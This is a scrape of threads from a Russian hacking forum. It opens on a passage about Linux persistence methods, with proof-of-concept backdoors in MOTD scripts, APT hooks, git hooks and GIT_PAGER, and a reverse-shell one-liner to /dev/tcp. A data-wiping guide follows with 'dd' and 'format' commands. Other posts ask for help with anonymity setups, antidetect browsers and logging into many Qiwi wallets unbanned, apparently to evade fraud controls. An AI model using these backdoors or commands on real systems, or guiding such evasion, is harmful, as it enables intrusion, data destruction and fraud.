'tracepoint:syscalls:sys_enter_execve { printf("%d %s\n", pid, comm); }' **Seccomp (режим безопасных вычислений)** : * Ограничивает системные вызовы, которые может выполнять процесс. * Может использоваться для создания среды песочницы. * Пример: Блокировка execve системный вызов в программе C: Code:Copy to clipboard #include <seccomp.h> ... scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW); seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0); seccomp_load(ctx); ### Способ 1: эмуляция/реализация системного вызова в пользовательском пространстве Spoiler 1. **Пользовательский загрузчик для Execve/Execveat** : * Реализация собственного загрузчика для обработки двоичных файлов ELF. * Пример: анализ заголовков ELF и ручное сопоставление сегментов в памяти. 2. **Реализация чтения/записи с помощью Mmap** : * С использованием mmap()для отображения файла в памяти и выполнения операций чтения/записи. * Пример: Code:Copy to clipboard int fd = open("file.txt", O_RDWR); char *data = mmap(NULL, length, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); // Чтение и запись с использованием указателя данных ### Способ 2: используйте альтернативные системные вызовы Spoiler 1. **С использованием fork()или clone()** : * Изменение полезных данных для использования fork()или clone()для создания процесса. 2. **Альтернативные методы чтения/записи** : * С использованием sendfile()для копирования файлов. * Пример: Code:Copy to clipboard sendfile(dest_fd, src_fd, NULL, filesize); С использованием pread()/ pwrite()для позиционного файлового ввода-вывода. **Операции с дескриптором файла PID (pidfd)** : * С использованием pidfd_open()и pidfd_getfd()для межпроцессной передачи дескриптора файла. * Пример: Code:Copy to clipboard int pidfd = pidfd_open(pid, 0); int fd = pidfd_getfd(pidfd, target_fd, 0); ### Метод 3: Обман параметров Spoiler 1. **Использование символических ссылок для ввода-вывода файлов** : * Создание символических ссылок для перенаправления путей к файлам. * Пример: Code:Copy to clipboard ln -s /path/to/real/file /path/to/symlink **Изменение представления процесса о файловой системе** : * С использованием chrootили смонтируйте пространства имен, чтобы изолировать и изменить представление процесса о файловой системе. #### **Изменение переменных среды** * **Цель** : изменение переменных среды для изменения поведения программного обеспечения. * **Метод** : Добавьте или измените записи в файлах, например ~/.bash_profile, ~/.bashrc, или /etc/environment. * **Пример** : установка пользовательского пути к библиотеке. Code:Copy to clipboard echo 'export LD_LIBRARY_PATH=/my/custom/path:$LD_LIBRARY_PATH' >> ~/.bashrc #### **Скрипты входа** * **Цель** : выполнение сценариев при входе пользователя в систему. * **Метод** : Добавить скрипты в /etc/profile.d/. * **Пример** : Создание сценария входа в систему. Code:Copy to clipboard echo 'echo "Welcome, $USER!"' > /etc/profile.d/welcome.sh chmod +x /etc/profile.d/welcome.sh #### **XDG автозапуск** * **Назначение** : Автозапуск приложений в графических средах рабочего стола. * **Метод** : Создать .desktopфайлы в ~/.config/autostart/. * **Пример** : автозапуск сценария. Code:Copy to clipboard [Desktop Entry] Type=Application Exec=/path/to/script.sh Hidden=false NoDisplay=false X-GNOME-Autostart-enabled=true Name=MyScript #### **правила udev** * **Цель** : запускать действия при возникновении определенных аппаратных событий. * **Метод** : Добавить пользовательские правила в /etc/udev/rules.d/. * **Пример** : запуск сценария при подключении USB-устройства. Code:Copy to clipboard echo 'ACTION=="add", KERNEL=="sd*", RUN+="/path/to/script.sh"' > /etc/udev/rules.d/99-usb-autorun.rules #### **Команды псевдонимов** * **Цель** : изменить или расширить поведение команд оболочки. * **Метод** : Определить псевдонимы в ~/.bashrcили ~/.bash_aliases. * **Пример** : Создание псевдонима для ls. Code:Copy to clipboard echo 'alias ls="ls --color=auto"' >> ~/.bashrc #### **Двоичная замена или перенос** * **Цель** : заменить или обернуть системные двоичные файлы собственными скриптами. * **Метод** : переименуйте исходный двоичный файл и замените его скриптом, вызывающим оригинал. * **Пример** : упаковка cat. Code:Copy to clipboard mv /bin/cat /bin/cat.original echo -e '#!/bin/bash\n/bin/cat.original "$@"' > /bin/cat chmod +x /bin/cat #### **Модули ядра** * **Цель** : Загрузка пользовательских модулей ядра для различных целей. * **Метод** : Напишите и скомпилируйте модуль ядра, затем загрузите его с помощью insmodили modprobe. * **Пример** : Загрузка пользовательского модуля. Code:Copy to clipboard sudo insmod /path/to/module.ko #### **Триггеры базы данных (для систем, использующих базы данных)** * **Цель** : выполнение действий на основе событий базы данных. * **Метод** : Создайте триггеры в системах баз данных, таких как MySQL или PostgreSQL. * **Пример** : Создание триггера в MySQL. Code:Copy to clipboard CREATE TRIGGER example_trigger AFTER INSERT ON my_table FOR EACH ROW BEGIN CALL my_procedure(); END; ## MOTD-бэкдоринг Spoiler MOTD означает «Сообщение дня» — сообщение, которое отображается пользователям, когда они подключаются к системе по SSH. Он настраивается в каталоге /etc/update-motd.d/, и злоумышленники могут помещать произвольные команды в любой из файлов, перечисленных там. Поэтому в этой статье его можно использовать как метод Persistence, и мы получаем обратную оболочку всякий раз, когда пользователь подключается к системе по SSH. PoC В этом сценарии мы отредактируем заголовочный файл MOTD, включив в него однострочную обратную оболочку. 1. Отредактируйте /etc/update-motd.d/00-header: Этот файл используется для создания заголовка MOTD: ![3.png](https://xss.is/attachments/73422/) Для упорства мы воспользуемся следующим лайнером: Code:Copy to clipboard bash -c 'bash -i >& /dev/tcp/192.168.1.132/1234 0>&1' SSH в системе: пользователь должен подключиться к системе по SSH, чтобы ему был показан MOTD и вместе с ним был выполнен наш лайнер. После SSHing:![](https://xss.is/attachments/73423/?hash=b0282384acfd682b32f2468542f2e8af) И мы получаем shell обратно. ## APT бэкдоринг Spoiler APT — это менеджер пакетов в системах на базе Debian, который расшифровывается как Advanced Packaging Tool. Менеджеры пакетов — это инструменты, доступные нам для установки/удаления/обновления пакетов и самой системы. Доступ к APT можно получить с помощью команды apt и настроить в каталоге /etc/apt. У APT и других менеджеров пакетов также есть концепция под названием «хуки», которая используется для каких-либо действий до/после установки/удаления/обновления и т. д. Обычно используется для поддержки пакетов и предотвращения взлома системы. С точки зрения злоумышленника, его можно использовать для поддержания Persistence путем создания перехватчика, предоставляющего нам доступ к системе всякий раз, когда, например, происходит действие подходящего обновления. PoC В этом сценарии мы установим перехватчик перед обновлением apt, чтобы вернуть нам оболочку. 1. Создайте файл хука: чтобы создать файл хука, мы должны сделать это в каталоге /etc/apt/apt.conf.d/. Имя может быть любым, APT все равно его выполнит: ![5.png](https://xss.is/attachments/73425/) 2.Обновление Apt: после того, как пользователь вызывает команду apt update, наш хук также выполняется, что приводит к обратной оболочке, что обеспечивает Persistence: ![6.png](https://xss.is/attachments/73427/) ## Бэкдоринг Git Spoiler Git — это распределенная система контроля версий, которая отслеживает изменения в любом наборе компьютерных файлов и обычно используется для координации работы программистов, совместно разрабатывающих исходный код во время разработки программного обеспечения. В git есть две концепции, которые могут быть полезны злоумышленникам: перехватчики и файл конфигурации. Крючки: Точно так же, как мы установили хуки в APT, это можно сделать и для git. Мы можем установить хуки для pre-commit/post-commit/pre-merge/post-merge/.. Эти хуки должны быть помещены в каталог .git/hooks/. Их нельзя назвать как угодно, у них есть свои уникальные имена, например precommit. После их создания в их разрешении должен быть установлен бит исполняемого файла. **POC** В этом сценарии мы создадим перехватчик предварительной фиксации, поместим в него один вкладыш нашей обратной оболочки и установим разрешение на его исполняемый бит, а затем добавим новый коммит для получения доступа к системе. 1. Создайте перехватчик предварительной фиксации: этот файл должен быть создан в каталоге .git/hooks/. ![7.png](https://xss.is/attachments/73428/) После этого его необходимо сделать исполняемым с помощью команды sudo chmod +x .git/hooks/pre-commit. 2.Добавить новый коммит: этот хук сработает непосредственно перед добавлением нового коммита. ![8.png](https://xss.is/attachments/73429/) И мы получаем обратный шелл прямо в каталоге git. ## Конфиг Spoiler Существуют некоторые переменные среды, и их можно настроить на выполнение произвольных команд всякий раз, когда должно произойти какое-либо действие, например git log и соответствующая переменная среды GIT_PAGER. Эта переменная используется для определения пейджера, который будет использоваться при вызове git log. Эти параметры также можно установить в файлах .git/config и ~/.gitconfig. **POC** В этом сценарии мы будем редактировать параметр пейджера и включим туда один лайнер нашей обратной оболочки, который будет выполняться всякий раз, когда пользователь запускает git log . 1. Настройте файл конфигурации: мы должны добавить новую запись в раздел [core] файла с именем pager. ![9.png](https://xss.is/attachments/73430/) По сути, это выполняет нашу обратную оболочку, а также использует less для отображения журнала git, как ожидалось. 2\. Журнал Git: после того, как пользователь запускает эту команду, наша команда выполняется. ![10.png](https://xss.is/attachments/73431/) И мы получаем нашу обратный шелл. ## Бэкдоринг OpenVPN Spoiler OpenVPN — это программное приложение с открытым исходным кодом, которое обеспечивает безопасное соединение «точка-точка» или «сеть-сеть» в маршрутизируемых или мостовых конфигурациях. Он обычно используется для создания виртуальных частных сетей (VPN) для обеспечения безопасной связи через Интернет. Пользователи обычно подключаются к серверу OpenVPN с помощью клиентского программного обеспечения и файла конфигурации с расширением .ovpn. Злоумышленник может изменить файлы конфигурации .ovpn, включив в них бэкдор, что позволит им поддерживать постоянный доступ. Это может включать добавление дополнительных директив конфигурации, которые обеспечивают несанкционированный доступ или скрывают присутствие злоумышленника. __Спасибо за Внимание!__

Как зашифровать Lineage OS?

ID: 676533bbb4103b69df371ab1
Thread ID: 72312
Created: 2022-08-27T19:35:00+0000
Last Post: 2022-09-30T16:00:41+0000
Author: HarleyMansion
Replies: 12 Views: 468

Приветствую. Скачал Lineage OS с оффициального сайта, установил на устройство (телефон в списке оффициально поддерживаемых). Все прекрасно, хорошо работает, но зашифровать телефон невозможно. Возможно поставить только экранный пароль screen lock. То есть на этапе когда телефон выключаешь-включаешь, пароль не просит, и поставить его нет возможности(по крайней мере через настройки телефона). На сайте lineage и lineage wiki про это ничего нет. Как вы понимаете это серьезная уязвимость в безопасности устройства. Как быть? Кто-то сталкивался с этим? Если да, удалось решить?

A Practical Guide to Digital Forensics Investigations, 2nd Edition by Darren R. Hayes

ID: 676533bbb4103b69df371c52
Thread ID: 47134
Created: 2021-01-24T09:24:31+0000
Last Post: 2021-01-24T09:24:31+0000
Author: x00c4sub
Replies: 0 Views: 468

This book is a practical guide, not only because of the hands-on activities it offers, but also because of the numerous case studies and practical applications of computer forensics techniques. Case studies are a highly effective way to demonstrate how particular types of digital evidence have been successfully used in different investigations. Finally, this book often refers to professional computer forensics tools that can be expensive.

[ A Practical Guide to Digital Forensics Investigations, 2nd Edition by

Darren R. Hayes.epub ](https://cloud.mail.ru/public/Geuf/Eg6fmbu4Z)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Система виртуализации Android?

ID: 676533bbb4103b69df371a95
Thread ID: 76019
Created: 2022-11-16T20:58:24+0000
Last Post: 2022-11-16T21:30:28+0000
Author: KanyeWest13
Replies: 1 Views: 467

Добрый день. У кого-нибудь был опыт использование систем виртуализации на телефоне? Может быть есть какие-нибудь аналоги virtual box для использования на андроиде?

Вопросы по Kali Linux, настройка, анонимность, итд.

ID: 676533bbb4103b69df371ab0
Thread ID: 73518
Created: 2022-09-22T20:37:11+0000
Last Post: 2022-10-02T11:53:36+0000
Author: MisterNobody
Replies: 8 Views: 467

Всех приветствую

Ситуация такая, настроил ноут для безопасной работы по ВК (100% будут заявления в органы) из ***** и палок. Для работы выбрал Kali (VirtualBox) с завернутым трафиком через TOR и последняя ступень было добавление на выходе из последнего узла VPN. Я перепробовал куча гайдов, начиная от добавления банальных впн вроде windscribe через клиент, заканчивая настройкой конфигов через OpenVPN (где либо я что-то не так делаю, либо просто система не дает мне возможности это сделать). Обращаюсь к гуру и буду благодарен за подробный гайд по настройке через OpenVPN, использую Mullvad конфиг, а так же дайте пожалуйста здравую оценку моему исходному варианту: Whonix - Kali - Opera Browser со встроенным впн. Я понимаю, что многие могут сказать что это пздц какой бред, но у меня пока что вышел только такой вариант. Трафик проходит через тор и выходит через оперовский впн, этого я думаю достаточно чтобы соц сеть ВК пропустила меня на свой ресурс, а не тупо блокировала трафик тора. Так же уточните, достаточно ли этого для полной анонимной работы по этой соц сети? Буду благодарен за любую здравую критику и прошу простить, если эта тема написана слегка глупо, так как уже 10-ый час за ноутбуком и возня с настройкой, а так же уже середина ночи, но ответ надеюсь получить к завтрашнему утру-край обеду. И последний момент пожалуй, какую информацию о железе передаст Кали на сервера ВК и будет ли это критично влиять на уровень безопасности. Всем мира

Можно ли зашифровать весь диск на выделенном сервере

ID: 676533bbb4103b69df371b78
Thread ID: 59495
Created: 2021-11-30T12:33:48+0000
Last Post: 2021-12-01T18:11:13+0000
Author: jeric
Replies: 11 Views: 465

Возможно ли зашифровать весь диск на выделенном сервере? ОС windows. Получается что после шифрования, перед запуском ОС сначала необходимо ввести пароль. Соответственно по протоколу rdp не подключиться.

Объясняем, каким образом силовики находят пользователей Telegram и как этого избежать

ID: 676533bbb4103b69df371af1
Thread ID: 70287
Created: 2022-07-18T13:14:03+0000
Last Post: 2022-07-18T18:53:29+0000
Author: blackswan
Replies: 2 Views: 463

Объясняем, каким образом силовики находят пользователей Telegram и как

этого избежать

В Беларуси много людей арестовали за комментарии в телеграме, но многие до сих пор не знают, как работает мессенджер и как силовики находят пользователей. Разобрались для вас.

Click to expand...

https://m.nashaniva.com/ru/articles/294433/

Полезная статья, но неполная. Этого недостаточно. Необходимо отключить геолокацию устройства при использовании Telegram. И писать комментарии от имени каналов.

Личная рекомендация: избегайте Telegram, используйте tox или xmpp.

Антидетекты палятся

ID: 676533bbb4103b69df371b08
Thread ID: 63580
Created: 2022-02-27T20:33:30+0000
Last Post: 2022-06-05T20:00:43+0000
Author: Mohgol
Replies: 4 Views: 463

Приветствую всех форумчан. Всем мира и добра.

Вообщем следующая ситуация:

1. Палит антидетект системы на подобий pixelscan палят мол браузер chromium. А как мы все знаем обычные смертные изредка или же вообще не пользуются браузером chromium.
2. Пытался что то сделать поменять user agent но увы все равно же палится.
3.Антидетект (dolphin и собственно Incogniton) как обстоят дела у владельцев spherы? и как решить нынче данный вопрос.

Как поставить прокси в конце цепочки Whonix Gateway -> Windows?

ID: 676533bbb4103b69df371ad6
Thread ID: 71664
Created: 2022-08-14T15:40:26+0000
Last Post: 2022-08-16T05:27:36+0000
Author: kommercheskiy
Replies: 11 Views: 461

Доброго времени суток! Суть проблемы такова: На виртуальной машине установлена ОС Whonix. Она разделяется на Gateway и Workstation. Gateway сворачивает весь трафик через тор. Вместо Workstation поставил Windows 10, то есть на виртуалке с Виндой весь трафик идет через тор и не может выйти за его пределы. Все это было сделано для того чтобы в конце этой цепочки, на Винду поставить Прокси (Сокс5) и получить белый статичный IP на выходе. Однако этого не получается сделать. В настройках браузера FireFox ввожу данные от Сокса (Хорошего, платного), после этого интернет в FireFox просто отключается. Пробовал вводить данные Прокси в настройках самой Винды, то же самое - 0 результата, Винда просто игнорирует это и на выходе показывает Тор IP. Я уверен что делаю что-то неправильно. Скорее всего прописанные в Windows настройки (для всего трафика через тор с помошью Gateway) не дают поставить прокси на выходном IP
Белый статичный IP на выходе очень нужен.
Возможно кто-то сталкивался с такой проблемой?
Буду очень благодарен за возможные решения.

С Уважением, Kommercheskiy

16k proxy ( ~9k unique)

ID: 676533bbb4103b69df371c04
Thread ID: 51360
Created: 2021-05-03T20:52:24+0000
Last Post: 2021-05-03T20:52:24+0000
Author: nsidcz
Replies: 0 Views: 460

Держите, если что-то не так - не бейте, я новенький

Как удалить (уничтожить) данные

ID: 676533bbb4103b69df3719b8
Thread ID: 106903
Created: 2024-01-28T19:50:57+0000
Last Post: 2024-01-30T14:59:01+0000
Author: kll111
Prefix: Статья
Replies: 3 Views: 456

Восстановление и уничтожение данных — две стороны одной медали. Чтобы знать, когда и как можно вернуть себе информацию, надо понимать и как она может быть уничтожена безвозвратно. А в некоторых ситуациях бывает просто необходимо: например, уничтожение корпоративной информации при утилизации оборудования, уничтожение ваших личных данных при передаче диска в пользование друзьям или продаже, а может быть вы раз и навсегда хотите удалить историю переписки с любовницей

Считается, что лучшие специалисты по восстановлению данных работают в спецслужбах, поэтому мы сформулировали вопрос именно таким образом: как уничтожить информацию с диска так, чтобы её не восстановили ни копы из отдела «К», ни Q из Джеймса Бонда.

Уничтожение данных программным методом

Если вы хотите ещё использовать жёсткий диск после уничтожения данных, и никуда не торопитесь, то стоит посмотреть в сторону программных методов удаления данных.

Полная перезапись диска

Существует много алгоритмов для уничтожения данных через полную перезапись диска. Но все они сводятся к N-кратному форматированию и записи на него двоичных единиц, нулей и псевдослучайных чисел. Так как скорость записи на диск обычно не превышает 70 MB/s, то вооружившись калькулятором мы посчитаем, сколько нам потребуется времени?

Формула достаточно простая: Объём диска (MB) / Скорость записи * Количество циклов = Секунды; 500000 / 70 * 7 = 50000 (сек.).

Из этого мы можем сделать вывод, что диск объёмом в 500 GB будет “стираться” около 13 часов. Но стоит ли нам использовать 7 циклов перезаписи? Современные носители информации не оставляют остаточной намагниченности после перезаписи данных. Поэтому нам хватит и одного цикла. Значит времени нам понадобится не 13 часов, а всего лишь 1.5.

Операционные системы имеют инструменты для полного удаления файлов.

Windows:

format c:

Вместо "c: " необходимо указать букву логического раздела.

Для Windows Vista и старше, предыдущие поколения Windows удаляют только служебную информацию.

Linux:

dd if=/dev/zero of=/dev/sda bs=4k

Вместо "/dev/sda " необходимо указать адрес устройства для форматирования.

Частичная перезапись данных

Используя прямое подключение к жёсткому диску на нижнем уровне через API драйвера диска или собственный драйвер, можно быстро испортить информацию, перезаписывая промежутки данных псевдослучайными числами. Напрямую указывая адрес памяти, в который выполнять запись, мы не нуждаемся в полной перезаписи диска. Также через API драйвера диска можно получить адреса, в которых хранится информация, и перезаписывать только эту область памяти. Данный способ самый сложный в своём исполнении, но с другой стороны позволяет быстро уничтожить только конфиденциальную информацию, сохраняя работоспособность диска.

Работа с драйвером предполагает 2 стадии:

Первая — это получение адреса и длину данных, обычно один файл записан в разных местах на диске, поэтому мы получим массив адресов и массив длин.

Второй шаг — это запись псевдослучайных чисел в данные области памяти, запись необходимо производить также через драйвер, для того, чтобы операционная система не заблокировала или не перенаправила запись данных в другую область диска

Уничтожение данных вместе с диском

Усложним задачу: представим, что у нас нет времени на безопасное для диска уничтожение данных. В таком случае единственное что вам может помочь — уничтожение самого диска. А если быть точным, то нужно уничтожить только блины, на которые записывается информация.

Механическое уничтожение данных

Раз и навсегда уничтожить данные получится, если испортить блины жёсткого диска. Сложно и зачастую невозможно восстановить данные с поцарапанных дисков, не забудьте держать рядом с собой отвёртку, ведь вам придётся снять крышку жёсткого диска и ею же можно жёсткий диск поцарапать. Естественно, данные будут стёрты в тех местах, где была проведена царапина и смежных с ней. В остальных местах данные можно будет восстановить в лаборатории. Не жалейте свои силы на царапины, лёгкие полоски не уничтожат данные даже в местах, где побывала ваша отвёртка. А если погнуть блин то ваши данные уже точно никем никогда не будут восстановлены.

Но уронить диск на пол будет недостаточно. Да, он не определится компьютером, но данные успешно восстановят в лаборатории. HDD диск не переживёт падения со стола, причём в выключенном состоянии высота безопасного падения больше, чем во время работы диска. SSD были разработаны с расчётом на такой случай, даже падение из окна первого-второго этажа не убьёт диск. Это достигается за счёт того, что в SSD нет подвижных элементов, все действия выполняет контроллер. Информация по прежнему может быть прочитана программным или непрограммным способом.

Современные диски сделаны из стекла с магнитным напылением. Достаточно снять крышку диска, вытащить магнитный диск и сломать его. Диск из стекла легко ломается, но стоит соблюдать меры безопасности, дабы не порезаться. Слом диска приведёт к разрушению всего слоя напыление и восстановить данные уже не представится возможным.

Физически

«То, что не убивает нас, делает нас сильнее.» Логично будет предположить и обратное: то, что не делает нас сильнее, убивает нас. Положив в морозильную камеру ваш носитель важной информации, вы его не убиваете. В ваших руках “бомба” замедленного действия — диск будет работать и с него можно будет прочитать информацию программным способом. Когда же диск сломается, то все данные без особого труда восстанавливаются в “чистой комнате”.

А что диски думают о нагревании? Среди всех устройств диска нас интересуют только блины. Материал, которым покрыт блин, способен размагничиваться при температуре 450 °C. При нагревании магнитный слой должен окисляться и становиться зелёного цвета. Ещё один негативный для диска, но положительный для нас результат даёт температура более 660 °C.

При такой температуре начинает плавиться алюминий — основа блина жёсткого диска. Температуру в 750 °C в домашних условиях можно получить от пламени свечи или горящей спички. Для достижения максимальной температуры необходимо пламя подставить самым краем к блину.

Также размагнитить диск можно с помощью электромагнита, воздействуя на блин переменным магнитным полем с увеличением расстояния от магнита до диска. Воздействуя импульсами на жёсткие диски, они полностью размагничивают диск, что приводит к невозможности восстановить какие-либо данные на нём. Данные устройства уничтожают всё за 2-3 секунды.

Химически

Как вы уже, наверное, поняли, чтобы уничтожить данные — нужно уничтожить магнитный слой блина жёсткого диска. На диск достаточно вылить любой жидкости, которая способна изменять свойства ферромагнетиков. Чтобы изменить строение оксида хрома (ферромагнетик, которым покрывают блины жёстких дисков, — магнитный слой диска), необходимо вылить на него соляную кислоту или воду при температуре 100 °C.

Что ещё важно?

Если вам не требуется длительное хранение конфиденциальных данных — записывайте их на энергозависимую (оперативную) память, тогда вам не придётся беспокоиться об уничтожении.

Убедитесь, что с других носителей, на которых когда-либо была записана копия, нельзя восстановить ваши данные.

Будьте бдительны при передаче данных по сети. Используйте устройства криптографической защиты. Если ваша информация останется на сервере, то уничтожение её с вашего носителя никак не защитит её. В этом случае имеет смысл шифровать хранимую в облаке информацию специальным софтом.

источник: хабр

Как заходить на киви кошельки через анонимную систему, не получив бан?

ID: 676533bbb4103b69df371ad3
Thread ID: 71624
Created: 2022-08-13T15:29:13+0000
Last Post: 2022-08-18T01:26:09+0000
Author: kommercheskiy
Replies: 12 Views: 455

Доброго времени суток, Уважаемые форумчане!

У меня стоит Whonix на виртуаьной машине. Мне нужно заходить на много киви кошельков (они будут постоянно менятся). Whonix весь трафик сворачивает через Тор. Киви за тор беспощадно банит. Поставить прокси или ВПН сверху на Whonix (чтобы на выходе был белый IP) противоречит безопасности этой системы (это написано в документации на оффициальном сайте). Я думал купить выделенный сервер (дедик) и подключаться к нему. Но Дедики стоят очень дорого и там всего один IP, а заходить мне надо во множество кошельков, возможно даже одновременно. Я слышал про antidetect браузеры, но не понимаю как применять их анонимно через whonix (чтобы не было видно использование тора).

Заранее спасибо за Ваши ответы!

С Уважением, Kommercheskiy

Помогите со связкой

ID: 676533bbb4103b69df371aaf
Thread ID: 73626
Created: 2022-09-25T23:35:23+0000
Last Post: 2022-10-02T13:55:12+0000
Author: asddddd
Replies: 10 Views: 454

В общем я полный нуб в этом, сильно не ругайтесь.
Я сижу через ipvanish-whonix , в качестве рабочей машины- linux mint, но мне нужен чистый ip на firefox. Как на него поставить прокси? Нашел proxychains , но настроить его не смог. И вообще все ли нормально в моей связке, что поменять?

Параметры конфигураций OpenVPN. Как настроить приобретенный резидентский конфиг под нужный вам клиент.

ID: 676533bbb4103b69df371a0c
Thread ID: 96954
Created: 2023-08-30T23:30:08+0000
Last Post: 2023-09-10T06:58:20+0000
Author: dutchavelli
Replies: 15 Views: 449

В процессе работы я сталкивался с разными конфигами, которые не дружат с некоторыми версиями OpenVPN. Вообще OpenVPN клиент - весьма странная вещь. Новые версии не имеют никакой обратной совместимости со старыми конфигами, либо не поддерживают некоторые параметры, сегодня я разберу некоторые из них (те, которые необходимо менять в зависимости от устройства-клиента OpenVPN, чтобы у вас не возникало проблем при использовании). С полной документацией можно ознакомиться по [официальной ссылке](https://openvpn.net/community- resources/reference-manual-for-openvpn-2-4/). Отдельного упоминания заслуживают клиенты в известных нам прошивках на малину с веб-интерфейсом, которые просто не дружат ни с чем и сыпят ошибками, ну да ладно, сегодня мы собрались здесь не для того чтобы поносить необразованных ~~кокеров~~ программистов, а для того чтобы самим получить полезные в работе знания ~~и делать пять лямов баксов в сутки~~.

Для работы без raspberry настоятельно рекомендую использовать клиент Viscosity, который имеет обратную совместимость, умеет сам определять версию OpenVPN по конфигурации, а также имеет полезные настройки маршрутизации ipv4/ipv6 только через сервер а также не страдает от утечки DNS, как, к примеру, Tunnelblick для Mac OS. Аналоги - OpenVPN Connect 2.7.1 для Mac OS, либо же OpenVPN Connect 2.5.3/2.6.3 для Windows, но в случае работы с официальным клиентом лучше уточните у вашего селлера конфигураций, с какой версией его конфиги будут совместимы.

dev tun/dev tap - в данном параметре dev tun создает туннель к серверу, а dev tap прокладывает маршрут таким образом, как будто вы подключены напрямую к роутеру. В целом параметр dev tap лучше использовать для распберри, но на деле это не критично.

tun-mtu/mssfix отвечает за максимальный размер передаваемого пакета (если не указан в тексте конфига - используется значение 1450), рекомендую использовать mssfix 0 при использовании tcp и mssfix 1330 при использовании udp. Это выставит параметр в значение 1500, что характерно для стандартного подключения и позволит не палит VPN перед антифродом.

block-outside-dns это параметр для клиентов MacOS/Win/iOS/Android, который позволяет избежать утечки dns. Клиентом Tunnelblick (MacOS) и OpenVPN для raspberry данный параметр не поддерживается.

Также нужные вам dns сервера можно указать параметром dhcp-option DNS 8.8.8.8 (днс Google для примера)

windows-driver wintun - параметр для создания сетевого интерфейса подключения в Windows.

block-ipv6 - параметр для MacOS/Win/iOS/Android, который позволяет избежать утечки ip через ipv6. В raspberry/роутерах следует настраивать это другим способом, поскольку в них данный параметр не поддерживается.

script-security 2 - это параметр для Raspberry, который позволяет выполнить внешние скрипты, на практике позволяет избежать утечки dns при использовании на малине софта для поключения к dns по вашей конфигурации.

tls-version-min 1.0 - тоже параметр для распберри, поскольку в данный момент она использует TLS версий 1.0/1.1, а стандартный параметр OpenVPN это версия 1.2, поэтому следует указать этот параметр во избежание ошибок при подключении.

Здесь я разобрал основные параметры, из за которых подключение к конфигурации может приводить к ошибке при импорте их в Ваш клиент.

Остальные параметры на подключение влиять не будут , однако если есть интерес более подробно разобраться в технической части, а не только подключиться/активировать трубу/снять 5 долларов с инст плайда, вот полезные ссылки, короче будет время - ознакомитесь, думаю не стоит вас грузить инфой которая практически применима только если вы сами эти конфиги прокладываете и настраиваете.

https://openvpn.net/community-resources/

https://forums.raspberrypi.com/search.php?keywords=OpenVPN&sid=c0c7f5edf5c330126eb04c49952a0d38

https://habr.com/ru/articles/216295/

https://serverfault.com/questions/tagged/openvpn

Перевод текстовой специикации протокола TOX ч1

ID: 676533bbb4103b69df371a76
Thread ID: 85532
Created: 2023-04-09T08:56:29+0000
Last Post: 2023-04-09T08:56:29+0000
Author: вавилонец
Prefix: Статья
Replies: 0 Views: 447

Оригинал
1 Введение

Данный документ представляет собой текстовую спецификацию протокола Tox и всех вспомогательных модулей, необходимых для его реализации. Цель этого документа

дать достаточно инструкций, чтобы обеспечить полную и правильную реализацию протокола.
Все типы данных определены до их первого использования, и дано их двоичное представление в протоколе. Представления протокола являются нормативными и должны быть реализованы именно так, как указано. Для некоторых типов предлагаются человекочитаемые представления. Реализация может выбрать отсутствие такого представления или другое представление. Реализация может выбрать любое представление в памяти для указанных типов, если они могут быть закодированы в указанное представление протокола и декодированы из него.
Двоичные форматы указываются в таблицах с длиной, типом и содержимым . Если применимо, используются конкретные типы перечисления, поэтому в некоторых случаях типы могут быть необъяснимыми. Длина может быть либо фиксированным числом в байтах (например, 32), либо числом в битах (например, 7 бит), либо выбранной длины (например, 4 | 16), либо открытым диапазоном (например, [0, 100]). Открытые диапазоны обозначаются [n,], что означает минимальную длину n без указанной максимальной длины.

1.1 Цели и модель угроз

(TODO: это просто место для вставки; необходимо дать более техническое описание)
Этот раздел должен дать представление о целях и нецелях Tox, чтобы читатель:

понимал, какие проблемы Tox намерен решить

мог проверить, решены ли они данной спецификацией

мог принимать лучшие компромиссы и решения в своей собственной реализации протокола.

1.1.1 Что делает Tox

1.1.1.1 Аутентификация

Адрес пользователя является его открытым ключом, таким образом, "добавить друга" фактически означает проверить ключ. Недостатком является то, что после компрометации (раскрытия секретного ключа) вам придется генерировать новую личность.

1.1.1.2 Сквозное шифрование

Все сообщения шифруются ключами, полученными с помощью DH, поэтому ключи известны только отправителю и получателю и никогда не передаются по сети.

1.1.1.2.1 Полная прямая секретность

Достигается использованием эфемерных ключей (TODO: как они используются в текущем протоколе? решена ли проблема?).

1.1.1.3 Надежность

Токс должен быть полностью распределенной сетью, которая не зависит от какой- либо одной точки отказа. Это достигается за счет использования DHT и прямых (P2P) соединений между пирами в сети. Точка входа по-прежнему необходима. Процесс подключения к сети называется bootstrapping. Bootstrapping может и должен осуществляться с использованием нескольких точек входа.
Tox должен работать под (почти) любым видом NAT и брандмауэра; это достигается за счет использования пробивания дыр, UPnP и TCP-реле.

Устойчивость к основным DoS и другим атакам.

1.1.1.4 Zero-conf (простота в использовании)

Конечный пользователь должен иметь возможность использовать мессенджер, который просто работает. Безопасность, которую слишком сложно использовать, бесполезна.

1.1.2 Чего нет в Tox

1.1.2.1 Анонимность

Если не используется режим TCP, участники общаются друг с другом напрямую. Одной из причин этого является то, что передача видео в реальном времени с помощью чего-либо, кроме прямого соединения, является довольно дорогостоящей (с точки зрения пропускной способности), а также означает задержки.
Ваш IP-адрес доступен узлам из вашего списка друзей. Они могут связать ваш ID непосредственно с вашим IP-адресом.
Для поиска друзей используются временные узлы DHT и луковые туннели, так что ваш ID не может быть связан с вашим IP только на основе общедоступных данных (TODO: например, данные, хранящиеся в DHT? что еще открыто?); Хотя противник, перехватывающий трафик в достаточно большом сегменте сети, (вероятно) способен выполнить некоторую статистическую атаку; (TODO: какую проблему это должно решить? решает ли это? поскольку мы не заботимся об анонимности, я могу думать только о предотвращении некоторых целевых атак типа "отказ в обслуживании").
В случае, когда анонимность является проблемой, Tox может быть проксирован через HTTP или SOCKS5 прокси. Для анонимности необходимо использовать режим только TCP.

1.2 Целые числа

Протокол использует четыре ограниченных беззнаковых целочисленных типа. Ограниченные означают, что у них есть верхняя граница, за которой инкремент не определен. Целочисленные типы поддерживают модульную арифметику, поэтому переполнение обращается в ноль. Беззнаковые типы означают, что их нижняя граница равна 0. Знаковые целочисленные типы не используются. Двоичное кодирование всех целочисленных типов представляет собой последовательность байтов фиксированной ширины с кодировкой целого числа в Big Endian, если не указано иное.

Type name| C type| Rust type| Length| Upper bound
---|---|---|---|---
